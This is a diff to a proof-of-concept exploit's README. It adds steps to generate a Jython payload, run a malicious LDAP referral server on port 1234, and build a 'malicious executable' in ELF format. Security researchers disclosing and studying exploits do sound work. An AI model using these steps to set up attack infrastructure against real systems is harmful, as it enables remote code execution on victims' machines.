@@ -9,13 +9,25 @@ OpenJDK 64-Bit Server VM Corretto-11.0.4.11.1 (build 11.0.4+11-LTS, mixed mode)
 
 You will need https://github.com/pingidentity/ldapsdk/releases/tag/6.0.3
 
-Compile and start the LDAP server:
+Generate the payload:
 
 ```
 java -jar /Users/zhuowei/Downloads/ghidra_10.0.2_PUBLIC/Ghidra/Features/Python/lib/jython-standalone-2.7.2.jar generate_jython_payload.py
+```
+
+Java 17 users may need to run instead:
+
+```
+java --add-opens java.base/java.util=ALL-UNNAMED -jar /Users/zhuowei/Downloads/ghidra_10.0.2_PUBLIC/Ghidra/Features/Python/lib/jython-standalone-2.7.2.jar generate_jython_payload.py
+```
+
+Compile and start the LDAP server:
+
+```
 javac -cp .:/Users/zhuowei/Downloads/unboundid-ldapsdk-6.0.3/unboundid-ldapsdk.jar LDAPRefServer.java
 java -cp .:/Users/zhuowei/Downloads/unboundid-ldapsdk-6.0.3/unboundid-ldapsdk.jar LDAPRefServer 1234
 ```
+
 
 Compile the malicious executable into ELF format:
 
